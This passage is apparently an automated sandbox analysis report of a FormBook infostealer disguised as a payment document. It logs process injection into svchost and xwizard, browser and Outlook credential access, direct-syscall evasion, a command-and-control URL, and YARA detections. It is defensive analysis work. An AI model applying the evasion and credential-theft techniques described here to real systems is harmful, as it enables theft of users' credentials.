34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 37 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.27.2</center></body></html>0
            Source: gXhpelxbquSwSp.exe, 0000000E.00000002.12536862831.0000000002FCE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.deadshoy.tech
            Source: gXhpelxbquSwSp.exe, 0000000E.00000002.12536862831.0000000002FCE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.deadshoy.tech/0sq9/
            Source: X0a-0531.15.drString found in binary or memory: https://ac.ecosia.org?q=
            Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoitscript.comVP/
            Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoitscript.comVPv20
            Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoitscript.compb_rtb_ev_part/
            Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoitscript.compb_rtb_ev_partv20
            Source: X0a-0531.15.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: xwizard.exe, 0000000F.00000003.11840998779.0000000007AB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fpt.live.com/https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_author
            Source: xwizard.exe, 0000000F.00000002.12535879368.0000000000A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fpt.live.com/session_id=f79511e86c1f4ab69498b2fb7f2923a5&CustomerId=33e01921-4d64-4f8c-a055-
            Source: X0a-0531.15.drString found in binary or memory: https://gemini.google.com/app?q=
            Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.comVISITOR_INFO1_LIVE/
            Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.comVISITOR_INFO1_LIVEv20
            Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.comVISITOR_PRIVACY_METADATA/
            Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.comVISITOR_PRIVACY_METADATAv20ue
            Source: xwizard.exe, 0000000F.00000003.11841926942.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11841968377.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11843979281.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: xwizard.exe, 0000000F.00000003.11841926942.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11841968377.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11843979281.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com//
            Source: xwizard.exe, 0000000F.00000002.12535879368.0000000000A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: xwizard.exe, 0000000F.00000002.12535879368.0000000000A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033i
            Source: xwizard.exe, 0000000F.00000002.12535879368.0000000000A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: X0a-0531.15.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.0000000006B1C000.00000004.80000000.00040000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.000000000698A000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.00000000056FA000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.000000000588C000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12540120301.0000000007830000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.11673757784.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.12535665138.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.12536862831.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.11674260737.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.12537425982.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.12536524767.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.12536605737.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.11674681590.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Binary is likely a compiled AutoIt script file
            Source: Payment Copy #190922-001.exe, 00000000.00000000.11282684870.00000000000C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_995c5625-1
            Source: Payment Copy #190922-001.exe, 00000000.00000000.11282684870.00000000000C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_daa25851-b
            Source: Payment Copy #190922-001.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_57da8167-f
            Source: Payment Copy #190922-001.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_08cfe792-f
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Payment Copy #190922-001.exe
            Source: Payment Copy #190922-001.exe, 00000000.00000003.11310377322.00000000049B6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Copy #190922-001.exe
            Source: Payment Copy #190922-001.exe, 00000000.00000003.11308022579.00000000047AC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Copy #190922-001.exe
            Source: Payment Copy #190922-001.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@7/4
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeFile created: C:\Users\user\AppData\Local\Temp\aut316F.tmpJump to behavior
            Source: Payment Copy #190922-001.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: xwizard.exe, 0000000F.00000002.12535879368.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE plus_addresses (profile_id VARCHAR PRIMARY KEY, facet VARCHAR, plus_address VARCHAR);
            Source: xwizard.exe, 0000000F.00000003.11841926942.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11841968377.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11843979281.0000000000A78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Payment Copy #190922-001.exeReversingLabs: Detection: 36%
            Source: unknownProcess created: C:\Users\user\Desktop\Payment Copy #190922-001.exe "C:\Users\user\Desktop\Payment Copy #190922-001.exe"
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Copy #190922-001.exe"
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
            Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Copy #190922-001.exe"Jump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Payment Copy #190922-001.exeStatic file information: File size 1201664 > 1048576
            Source: Payment Copy #190922-001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Payment Copy #190922-001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Payment Copy #190922-001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Payment Copy #190922-001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Payment Copy #190922-001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Payment Copy #190922-001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Payment Copy #190922-001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gXhpelxbquSwSp.exe, 0000000E.00000000.11596619254.00000000003AE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Payment Copy #190922-001.exe, 00000000.00000003.11307708681.0000000004830000.00000004.00001000.00020000.00000000.sdmp, Payment Copy #190922-001.exe, 00000000.00000003.11308525255.0000000004680000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11584291378.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003236000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11582690162.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003100000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004810000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004946000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11677267845.0000000004654000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11675115446.00000000044A0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Payment Copy #190922-001.exe, 00000000.00000003.11307708681.0000000004830000.00000004.00001000.00020000.00000000.sdmp, Payment Copy #190922-001.exe, 00000000.00000003.11308525255.0000000004680000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11584291378.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003236000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11582690162.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003100000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004810000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004946000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11677267845.0000000004654000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11675115446.00000000044A0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xwizard.pdb source: svchost.exe, 00000004.00000003.11642197334.0000000002A2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11641588647.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000003.11743289735.000000000134C000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.00000000060EC000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.11972919990.000000000A6AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.00000000060EC000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.11972919990.000000000A6AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: xwizard.pdbGCTL source: svchost.exe, 00000004.00000003.11642197334.0000000002A2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11641588647.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000003.11743289735.000000000134C000.00000004.00000001.00020000.00000000.sdmp
            Source: Payment Copy #190922-001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Payment Copy #190922-001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Payment Copy #190922-001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Payment Copy #190922-001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Payment Copy #190922-001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeAPI/Special instruction interceptor: Address: 154A14C
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFD76B10454
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFD76B10914
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFD76B10A74
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFD76B10634
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFD76B10674
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFD76B10314
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFD76B13424
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFD76B10B74
            Source: C:\Windows\SysWOW64\xwizard.exeWindow / User API: threadDelayed 5737Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeWindow / User API: threadDelayed 4236Jump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe TID: 7392Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 7324Thread sleep count: 5737 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 7324Thread sleep time: -11474000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 7324Thread sleep count: 4236 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 7324Thread sleep time: -8472000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\xwizard.exeLast function: Thread delayed
            Source: xwizard.exe, 0000000F.00000002.12535879368.0000000000A05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
            Source: gXhpelxbquSwSp.exe, 0000000E.00000003.11743289735.000000000134C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd<
            Source: gXhpelxbquSwSp.exe, 0000000E.00000002.12536337922.0000000001369000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.11975192526.00000205CA67E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtTerminateThread: Direct from: 0x772170FCJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtReadVirtualMemory: Direct from: 0x77216FBCJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtResumeThread: Direct from: 0x7721783CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtMapViewOfSection: Direct from: 0x77216E4CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtWriteVirtualMemory: Direct from: 0x77216F6CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtReadFile: Direct from: 0x77216C0CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtAllocateVirtualMemory: Direct from: 0x77218B0CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtAllocateVirtualMemory: Direct from: 0x77216D2CJump to behavior
